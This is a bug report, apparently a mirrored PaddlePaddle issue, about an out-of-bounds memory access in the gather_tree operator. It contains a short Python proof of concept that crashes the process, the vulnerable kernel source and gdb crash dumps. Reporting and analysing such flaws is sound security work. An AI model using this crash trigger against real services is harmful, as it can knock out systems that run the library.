标题：算子gather_tree存在安全问题/bug
版本、环境信息：
   1）PaddlePaddle版本：2.1.0
   2）CPU/GPU：CPU
   3）系统环境: ubuntu 20.04
   4）Python版本号: 3.8.5

PoC：

import paddle
import paddle.fluid as fluid
import numpy as  np

ids = paddle.to_tensor([[2,2],[6,1]])
parents = paddle.to_tensor([[2,2],[6,1]])
out = paddle.nn.functional.gather_tree(ids,parents)

崩溃信息

--------------------------------------
C++ Traceback (most recent call last):
--------------------------------------
0   paddle::imperative::Tracer::TraceOp(std::string const&, paddle::imperative::NameVarBaseMap const&, paddle::imperative::NameVarBaseMap const&, paddle::framework::AttributeMap, std::map<std::string, std::string, std::less<std::string >, std::allocator<std::pair<std::string const, std::string > > > const&)
1   paddle::imperative::Tracer::TraceOp(std::string const&, paddle::imperative::NameVarBaseMap const&, paddle::imperative::NameVarBaseMap const&, paddle::framework::AttributeMap, paddle::platform::Place const&, bool, std::map<std::string, std::string, std::less<std::string >, std::allocator<std::pair<std::string const, std::string > > > const&)
2   paddle::imperative::PreparedOp::Run(paddle::imperative::NameVarBaseMap const&, paddle::imperative::NameVarBaseMap const&, paddle::framework::AttributeMap const&)
3   std::_Function_handler<void (paddle::framework::ExecutionContext const&), paddle::framework::OpKernelRegistrarFunctor<paddle::platform::CPUPlace, false, 1ul, paddle::operators::GatherTreeOpKernel<int>, paddle::operators::GatherTreeOpKernel<long> >::operator()(char const*, char const*, int) const::{lambda(paddle::framework::ExecutionContext const&)#1}>::_M_invoke(std::_Any_data const&, paddle::framework::ExecutionContext const&)
4   paddle::framework::SignalHandle(char const*, int)
5   paddle::platform::GetCurrentTraceBackString[abi:cxx11]()

----------------------
Error Message Summary:
----------------------
FatalError: `Segmentation fault` is detected by the operating system.
  [TimeInfo:***Aborted at 1623049987 (unix time) try "date -d @1623049987" if you are using GNU date***]
  [SignalInfo:***SIGSEGV (@0x7ff184021000) received by PID 4597 (TID 0x7ff197dad740) from PID 18446744071629312000***]

Segmentation fault (core dumped)

分析:

部分源码: (https://github.com/PaddlePaddle/Paddle/blob/v2.1.0/paddle/fluid/operators/gather_tree_op.h#L45)

auto &ids_dims = ids->dims();
auto max_length = ids_dims[0];
auto batch_size = ids_dims[1];
auto beam_size = ids_dims[2];         //[1]

for (int batch = 0; batch < batch_size; batch++) {
    for (int beam = 0; beam < beam_size; beam++) {
        auto idx = (max_length - 1) * batch_size * beam_size +
                   batch * beam_size + beam;      //[2]
        out_data[idx] = ids_data[idx];             //[3]

对ids的维度未进行检查，当ids的shape设置不当时（维度小于3，例设为2），导致
问题① [1]处访问未初始化内存;
问题② 当该内存处值过大时，beam_size值过大，从而导致[2]中idx值过大，从而[3]处发生越界访问的问题，导致程序崩溃。崩溃现场部分变量值如下：

(gdb) i locals
idx = 0x11ee400000110
ids_dims = @0x1f72ec8: {
  static kMaxRank = 0x9,
  ids_dims = @0x1e48f78: {
  static kMaxRank = 0x9,
  dim_ = {
    <paddle::framework::Array<long, 9>> = {
      static kSize = <optimized out>,
      data_ = {0x2, 0x2, 0x8f7200000088, 0x9272000000907200, 0x9f72000000, 0x33720000003372, 0x7200000033720000, 0x6d3c08da00000034, 0x1e3e656c75646f}
    },
  },
  rank_ = 0x2
}
beam_size = 0x8f7200000088

debug信息：

[ Legend: Modified register | Code | Heap | Stack | String ]
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
$rax   : 0x9771e7306e8c0
$rbx   : 0x00007fffffffd3e8  →  0x00007ffea33247aa  →  "gather_tree"
$rcx   : 0x8f72000000880
$rdx   : 0x9771e730708c0
$rsp   : 0x00007fffffffcee0  →  0x00007fffffffd090  →  0x00007ffea5feed70  →  0x00007ffea23853d0  →  <paddle::imperative::DygraphExecutionContext<paddle::imperative::VarBase>::~DygraphExecutionContext()+0> endbr64
$rbp   : 0x00007fffffffcfa0  →  0x00007fffffffcfe0  →  0x00007fffffffd010  →  0x00007fffffffd040  →  0x00007fffffffd210  →  0x00007fffffffd250  →  0x00007fffffffd440  →  0x00007fffffffd480
$rsi   : 0x2
$rdi   : 0x0000000001e48f78  →  0x0000000000000002
$rip   : 0x00007ffe9fc8afe7  →  <paddle::operators::GatherTreeOpKernel<long>::Compute(paddle::framework::ExecutionContext+0> mov rax, QWORD PTR [rax]
$r8    : 0x1
$r9    : 0x0
$r10   : 0xc70f6907
$r11   : 0x00007ffff7fbabe0  →  0x0000000001f9ba50  →  0x00007ffff79cbb70  →  0x0000000000000012
$r12   : 0x0
$r13   : 0x00007fffffffd980  →  0x00007fffffffd990  →  "gather_tree"
$r14   : 0x2
$r15   : 0x0
$eflags: [zero carry PARITY adjust sign trap INTERRUPT direction overflow RESUME virtualx86 identification]
$cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0x00007fffffffcee0│+0x0000: 0x00007fffffffd090  →  0x00007ffea5feed70  →  0x00007ffea23853d0  →  <paddle::imperative::DygraphExecutionContext<paddle::imperative::VarBase>::~DygraphExecutionContext()+0> endbr64          ← $rsp
0x00007fffffffcee8│+0x0008: 0x00007fffffffcfc0  →  0x00007ffea5fb1d10  →  0x00007ffe9fc8ad4c  →  <paddle::operators::GatherTreeOpKernel<long>::Compute(paddle::framework::ExecutionContext+0> endbr64
0x00007fffffffcef0│+0x0010: 0x00000000ffffcf20
0x00007fffffffcef8│+0x0018: 0x00007ffe00000000
0x00007fffffffcf00│+0x0020: 0x0000000000000000
0x00007fffffffcf08│+0x0028: 0x0000000001e48f58  →  0x4c055a5f00000000
0x00007fffffffcf10│+0x0030: 0x0000000001e3d838  →  0x7369206500000000
0x00007fffffffcf18│+0x0038: 0x0000000001d07548  →  0x0000000000000000
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
   0x7ffe9fc8afd8 <paddle::operators::GatherTreeOpKernel<long>::Compute(paddle::framework::ExecutionContext+0> lea    rcx, [rdx*8+0x0]
   0x7ffe9fc8afe0 <paddle::operators::GatherTreeOpKernel<long>::Compute(paddle::framework::ExecutionContext+0> mov    rdx, QWORD PTR [rbp-0x70]
   0x7ffe9fc8afe4 <paddle::operators::GatherTreeOpKernel<long>::Compute(paddle::framework::ExecutionContext+0> add    rdx, rcx
 → 0x7ffe9fc8afe7 <paddle::operators::GatherTreeOpKernel<long>::Compute(paddle::framework::ExecutionContext+0> mov    rax, QWORD PTR [rax]
   0x7ffe9fc8afea <paddle::operators::GatherTreeOpKernel<long>::Compute(paddle::framework::ExecutionContext+0> mov    QWORD PTR [rdx], rax
   0x7ffe9fc8afed <paddle::operators::GatherTreeOpKernel<long>::Compute(paddle::framework::ExecutionContext+0> mov    rax, QWORD PTR [rbp-0x48]
   0x7ffe9fc8aff1 <paddle::operators::GatherTreeOpKernel<long>::Compute(paddle::framework::ExecutionContext+0> lea    rdx, [rax*8+0x0]
   0x7ffe9fc8aff9 <paddle::operators::GatherTreeOpKernel<long>::Compute(paddle::framework::ExecutionContext+0> mov    rax, QWORD PTR [rbp-0x78]
   0x7ffe9fc8affd <paddle::operators::GatherTreeOpKernel<long>::Compute(paddle::framework::ExecutionContext+0> add    rax, rdx
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "python", stopped 0x7ffe9fc8afe7 in paddle::operators::GatherTreeOpKernel<long>::Compute (), reason: SIGSEGV
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
[#0] 0x7ffe9fc8afe7 → paddle::operators::GatherTreeOpKernel<long>::Compute(this=0x7fffffffcfc0, ctx=@0x7fffffffd090)
[#1] 0x7ffe9fc8a173 → paddle::framework::OpKernelRegistrarFunctor<paddle::platform::CPUPlace, false, 1ul, paddle::operators::GatherTreeOpKernel<int>, paddle::operators::GatherTreeOpKernel<long> >::operator()(char const*, char const*, int) const::{lambda(paddle::framework::ExecutionContext const&)#1}::operator()(paddle::framework::ExecutionContext const&) const(this=0x7fffffffd3e8, ctx=@0x7fffffffd090)
[#2] 0x7ffe9fc8c047 → std::_Function_handler<void (paddle::framework::ExecutionContext const&), paddle::framework::OpKernelRegistrarFunctor<paddle::platform::CPUPlace, false, 1ul, paddle::operators::GatherTreeOpKernel<int>, paddle::operators::GatherTreeOpKernel<long> >::operator()(char const*, char const*, int) const::{lambda(paddle::framework::ExecutionContext const&)#1}>::_M_invoke(std::_Any_data const&, paddle::framework::ExecutionContext const&)(__functor=@0x7fffffffd3e8, __args#0=@0x7fffffffd090)
[#3] 0x7ffea2386ee3 → std::function<void (paddle::framework::ExecutionContext const&)>::operator()(paddle::framework::ExecutionContext const&) const(this=0x7fffffffd3e8, __args#0=@0x7fffffffd090)

(gdb) x/10x $rax
0x9771e7306e8c0:        Cannot access memory at address 0x9771e7306e8c0

1条答案

按热度按时间

nnsrf1az1#

您好，我们已经收到了您的问题，会安排技术人员尽快解答您的问题，请耐心等待。请您再次检查是否提供了清晰的问题描述、复现代码、环境&版本、报错信息等。同时，您也可以通过查看官网API文档、常见问题、历史Issue、AI社区来寻求解答。祝您生活愉快～

Hi! We've received your issue and please be patient to get responded. We will arrange technicians to answer your questions as soon as possible. Please make sure that you have posted enough message to demo your request. You may also check out the API，FAQ，Github Issue and AI community to get the answer.Have a nice day!

赞(0）回复(0）举报 2021-11-30

Paddle 算子gather_tree存在安全问题/bug

1条答案

相关问题

热门标签

最新问答